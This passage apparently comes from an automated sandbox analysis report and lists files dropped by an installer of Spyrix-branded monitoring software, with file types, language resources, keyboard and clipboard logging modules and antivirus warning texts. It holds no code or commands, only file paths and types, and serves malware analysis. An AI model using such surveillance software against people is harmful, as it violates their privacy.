C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\id.cmd (copy)
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-1N2MA.tmp
|
MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel,
-128x-128, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-269PL.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-3JAMQ.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-4Q7R0.tmp
|
ASCII text, with very long lines (382), with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-4QL75.tmp
|
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data,
big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision
8, 320x240, components 3
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-632MH.tmp
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-9ATRT.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ASDJS.tmp
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-CF97D.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EI053.tmp
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-EQFVV.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-G2FM0.tmp
|
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-HULMH.tmp
|
PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-IFJUI.tmp
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-ILFVG.tmp
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-JF90R.tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-KF6J5.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-OO1B8.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-P60MT.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-PTR09.tmp
|
MS Windows 95 Internet shortcut text (URL=<"https://www.spyrix.com/purchase.php?from=sfk_uninstall">), ASCII text, with CRLF
line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-QFHKL.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-RQ4T2.tmp
|
MS Windows 95 Internet shortcut text (URL=<"http://www.spyrix.com/spyrix-products.php?from=sfk_install">), ASCII text, with
CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-T1S1U.tmp
|
PNG image data, 197 x 285, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-TQVVU.tmp
|
DOS batch file, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-V94IU.tmp
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lame_enc.dll (copy)
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\libeay32.dll (copy)
|
PE32 executable (DLL) (console) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-2ED8C.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-3C8V3.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-3OMSH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-83836.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-8R2OU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-C01RU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-C89EE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-COP25.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-DRVA7.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-FQ6TU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-I58FN.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-LD8T8.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-OHTH3.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-QNI7K.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-S0RFR.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-SMG4L.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-UAL2I.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-17P65.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-22K7B.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-3UOOI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-5GJ14.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-6TMEG.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-A3JKV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-APR2S.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-BE6VF.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-C3UII.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-EEOAO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-FJLB6.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-FUR3S.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-I4J31.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-JSQ9J.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-OUT44.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-QBCKO.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-REP42.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english.lng (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\360_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\AVG_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avast_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avira_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Kaspersky_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\McAfee_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\eset_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-0TKBV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-15VHB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-1MP1O.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-23NC0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-28S48.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-3AOBI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-3KPPE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-4HF6K.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-6OSFV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-9EIGP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-A6V3O.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-B0DQQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-BRSF4.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-D1SET.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-ES2GI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-HEV7O.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-JFQFP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-LPGDL.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-LS4VV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-NFVA8.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-OG1P0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-Q2FFE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-QDPS0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-QTVMT.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-VU4N3.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\logging.rtf (copy)
|
